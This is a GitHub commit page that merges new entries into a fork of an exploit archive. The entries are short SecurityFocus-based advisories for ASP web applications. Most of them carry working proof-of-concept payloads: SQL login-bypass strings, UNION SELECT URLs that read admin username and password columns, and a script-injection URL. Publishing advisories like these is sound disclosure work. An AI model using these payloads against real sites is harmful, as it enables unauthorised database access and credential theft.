Skip to content
This repository was archived by the owner on Nov 28, 2022. It is now read-only.

Commit f958d04

Browse files
committed
Merge pull request #3 from offensive-security/master
从原项目更新
2 parents f408c60 + 620cbde commit f958d04

122 files changed

Lines changed: 5270 additions & 4 deletions

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

files.csv

Lines changed: 121 additions & 4 deletions
Large diffs are not rendered by default.

platforms/asp/webapps/36063.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/49207/info
2+
3+
Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
The following example input is available:
8+
9+
Username : ' or 1=1 or ''=''
10+
Password: ' or 1=1 or ''=''

platforms/asp/webapps/36064.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49208/info
2+
3+
Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0106/category.asp?cat=[sqli]

platforms/asp/webapps/36065.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49209/info
2+
3+
Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0077/main.asp?key=[sqli]

platforms/asp/webapps/36066.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49210/info
2+
3+
Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]

platforms/asp/webapps/36116.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/49468/info
2+
3+
Kisanji is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/default.aspx?gr=[xss]

platforms/asp/webapps/36133.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/49614/info
2+
3+
Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
6+
7+
Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable.
8+
9+
http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E

platforms/asp/webapps/36134.txt

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
source: http://www.securityfocus.com/bid/49620/info
2+
3+
Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
4+
5+
Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
6+
7+
The following products are affected;
8+
9+
Microsoft SharePoint 2007
10+
Microsoft SharePoint 2010
11+
12+
http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]

platforms/asp/webapps/36138.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/49667/info
2+
3+
ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
4+
5+
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin

platforms/asp/webapps/36139.txt

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
source: http://www.securityfocus.com/bid/49668/info
2+
3+
Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/v1/urundetay.asp?id=21%28%29
8+
9+
http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
10+
11+
http://www.example.com/v1/linkler.asp?id=2%28%29
12+
13+
http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
14+
15+
http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
16+
17+
http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
18+
19+
http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin

0 commit comments

Comments
 (0)